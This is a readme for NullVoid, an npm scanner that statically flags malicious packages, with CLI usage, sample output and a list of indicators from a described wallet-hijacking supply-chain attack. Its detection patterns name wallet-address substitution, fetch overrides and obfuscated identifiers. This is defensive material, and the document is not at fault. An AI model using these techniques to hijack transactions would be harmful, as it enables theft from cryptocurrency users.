Package Exports
This package does not declare an exports field, so the exports above have been automatically detected and optimized by JSPM instead. If any package subpath is missing, it is recommended to post an issue to the original package (nullvoid) to support the "exports" field. If that is not possible, create a JSPM override to customize the exports field for this package.
Readme
NullVoid
Ø NullVoid - Detect and invalidate malicious npm packages before they reach prod.
Detect malicious or compromised npm packages and flag risky code before it reaches production — without executing unsafe code.
🚀 Quick Start
# Install globally
npm i -g nullvoid
# Scan current project dependencies
npx nullvoid scan
# Scan a specific package
npx nullvoid scan suspicious-package
# Get verbose output
npx nullvoid scan --verbose
# Output results as JSON
npx nullvoid scan --output json🔍 What NullVoid Detects
NullVoid uses multiple heuristic checks to identify potentially malicious packages, including sophisticated supply chain attacks:
1. Postinstall Script Analysis
- Detects packages with suspicious postinstall scripts
- Flags scripts that download or execute external code
- Identifies commands that could modify system files
2. Code Entropy Analysis
- Analyzes JavaScript files for unusually high entropy
- Detects obfuscated or packed code that might hide malicious intent
- Uses Shannon entropy to identify suspicious patterns
3. Suspicious File Patterns
- Scans for files with malicious naming conventions
- Detects executable files in npm packages
- Identifies hidden or obfuscated file structures
4. Wallet Hijacking Detection 🚨
- window.ethereum Interception: Detects packages that hook into wallet providers
- MetaMask Targeting: Identifies code that intercepts MetaMask transactions
- Transaction Redirection: Flags packages that silently redirect blockchain transactions
- Address Replacement: Detects attempts to replace legitimate wallet addresses
5. Network Response Manipulation 🚨
- Fetch/XMLHttpRequest Overrides: Detects packages that intercept network requests
- API Response Scanning: Identifies code that scans responses for blockchain addresses
- Levenshtein Algorithm Detection: Flags packages using "nearest match" algorithms
- Address Substitution: Detects replacement of legitimate addresses with attacker-controlled ones
6. Multi-Chain Targeting 🚨
- Cross-Chain Support: Detects packages supporting multiple blockchains
- Ethereum, Bitcoin, Litecoin, Tron, BCH, Solana: Identifies multi-chain attack capabilities
- Broader Attack Coverage: Flags packages that could target multiple cryptocurrency networks
7. Stealth Controls & Obfuscation 🚨
- stealthProxyControl Detection: Identifies hidden developer-like control interfaces
- Obfuscation Techniques: Detects code hiding mechanisms
- Hidden Control Mechanisms: Flags packages with concealed malicious functionality
- Eval/Decode Patterns: Identifies dynamic code execution attempts
8. Traditional Malicious Patterns
- Searches for crypto-mining code patterns
- Detects credential theft attempts
- Identifies data exfiltration mechanisms
📋 Usage Examples
Scan Your Project
# Navigate to your project directory
cd my-project
# Scan all dependencies in package.json
npx nullvoid scanScan Specific Packages
# Scan a single package
npx nullvoid scan express
# Scan with verbose output
npx nullvoid scan lodash --verboseCI/CD Integration
# In your CI pipeline
npx nullvoid scan --output json > security-report.json🚨 Real-World Attack Examples
NullVoid is designed to detect sophisticated supply chain attacks like the recent npm compromise:
Recent Attack: debug, chalk, and 16 other packages
- Attack Vector: Wallet hijacking through
window.ethereuminterception - Technique: Silent transaction redirection to attacker-controlled addresses
- Multi-Chain: Targeted Ethereum, Bitcoin, Litecoin, Tron, BCH, and Solana
- Stealth: Used obfuscation and
stealthProxyControlglobal object - Network Manipulation: Overrode fetch/XMLHttpRequest to replace addresses
- Obfuscated IoCs:
_0x112fa8,_0x180f,runmask,newdlocal,checkethereumw
How NullVoid Would Detect This Attack:
# Scan would detect multiple threat types:
npx nullvoid scan
# Results would show:
⚠️ 4 threat(s) detected:
1. WALLET_HIJACKING: Package may contain wallet hijacking code
Severity: CRITICAL
Details: Detected pattern '_0x112fa8' that could redirect transactions
2. NETWORK_MANIPULATION: Package may manipulate network responses
Severity: HIGH
Details: Detected pattern 'fetch.*override' for address replacement
3. MULTI_CHAIN_TARGETING: Package supports multiple blockchain networks
Severity: MEDIUM
Details: Detected multi-chain capabilities for broader attack coverage
4. STEALTH_CONTROLS: Package contains stealth controls or obfuscation
Severity: HIGH
Details: Detected pattern 'stealthProxyControl' hidden control mechanismsSpecific IoC Detection:
NullVoid detects the exact obfuscated strings and patterns used in the recent attack:
_0x112fa8- Primary obfuscated function identifier_0x180f- Secondary obfuscated string patternstealthProxyControl- Hidden developer control interfacerunmask- Malicious function namenewdlocal- Attack-specific variablecheckethereumw- Ethereum wallet checking function
🛡️ Security Features
- Static Analysis Only: Never executes potentially malicious code
- Multiple Detection Methods: Combines various heuristics for comprehensive coverage
- Real-time Scanning: Fast analysis without network dependencies
- CI/CD Ready: Easy integration into automated workflows
- Supply Chain Focus: Specifically designed to detect npm package compromises
🔧 Configuration
Command Line Options
| Option | Description | Default |
|---|---|---|
--verbose |
Enable detailed output | false |
--output <format> |
Output format (json, table) | table |
--version |
Show version information | - |
--help |
Show help information | - |
Example Output
🔍 NullVoid Scan Results
⚠️ 2 threat(s) detected:
1. POSTINSTALL_SCRIPT: Package contains postinstall script with suspicious commands
Package: suspicious-package
Severity: HIGH
2. HIGH_ENTROPY: Package contains files with unusually high entropy
Package: obfuscated-lib
Severity: MEDIUM
Scanned 15 package(s) in 234ms🚨 Threat Severity Levels
- CRITICAL: Wallet hijacking, transaction redirection, or immediate financial threat
- HIGH: Network manipulation, stealth controls, or significant security risk
- MEDIUM: Suspicious behavior requiring review
- LOW: Minor concerns or best practice violations
🚀 Upcoming Features
High Priority
- Real Package Tarball Analysis - Download and extract actual package files for deep scanning
- SARIF Output Format - Better CI/CD integration with standardized security reporting
- Configurable Rules System - JSON/YAML configuration for custom detection patterns
- Dependency Tree Analysis - Scan transitive dependencies for hidden threats
Performance & Integration
- Parallel Scanning - Multi-threaded analysis for faster results
- Public IoC Feeds - Integration with Snyk, npm advisories, and other threat intelligence
- Signature Hashing - Detect package tampering and verify integrity
- Structured Logging - Comprehensive reporting and audit trails
🤝 Contributing
We welcome contributions! Please see our Contributing Guide for details.
Development Setup
# Clone the repository
git clone https://github.com/kurt-grung/NullVoid.git
cd NullVoid
# Install dependencies
npm install
# Run tests
npm test
# Test the CLI
node bin/nullvoid.js scan📄 License
MIT License - see LICENSE for details.
🔗 Links
⚠️ Disclaimer: NullVoid is designed to help identify potentially malicious packages, but it's not a substitute for comprehensive security practices. Always review packages manually and keep your dependencies updated.